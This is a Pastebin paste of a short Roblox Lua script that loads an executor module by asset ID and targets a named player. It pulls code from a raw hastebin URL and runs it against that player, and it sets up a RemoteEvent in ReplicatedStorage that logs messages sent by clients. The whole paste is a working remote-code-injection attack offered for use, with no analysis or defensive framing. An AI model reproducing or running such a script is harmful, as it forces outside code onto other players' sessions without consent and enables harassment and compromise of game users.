Advertisement
GangHaning

Untitled

Dec 8th, 2016
184
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. local SBExe=require(382739820)
  2.  
  3.  
  4. targets = {"xXMrTiamo555Xx"}
  5.  
  6. function Shortner(X)
  7. if not (string.lower(type(X))=='string') then
  8. return nil;
  9. end;
  10. local NL = 0;
  11. for i = 1,string.len(X) do
  12. NL = i;
  13. end;
  14. for _, players in pairs (game:GetService('Players'):GetPlayers()) do
  15. if (string.sub(string.lower(players.Name),1,NL)==(string.lower(X))) then
  16. return players;
  17. end;
  18. end;
  19. return nil;
  20. end
  21.  
  22. if game.ReplicatedStorage:FindFirstChild("thisThingIsRandom") then
  23. game.ReplicatedStorage:FindFirstChild("thisThingIsRandom"):remove()
  24. end
  25.  
  26. local a = Instance.new("RemoteEvent",game.ReplicatedStorage)
  27.  
  28. a.Name = "thisThingIsRandom"
  29.  
  30. a.OnServerEvent:connect(function(plr, args)
  31. print(plr.Name..": "..args)
  32. end)
  33.  
  34. for i,v in pairs(targets) do
  35. SBExe("hl/http://www.hastebin.com/raw/oceguyovak",Shortner(v).Name)
  36. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement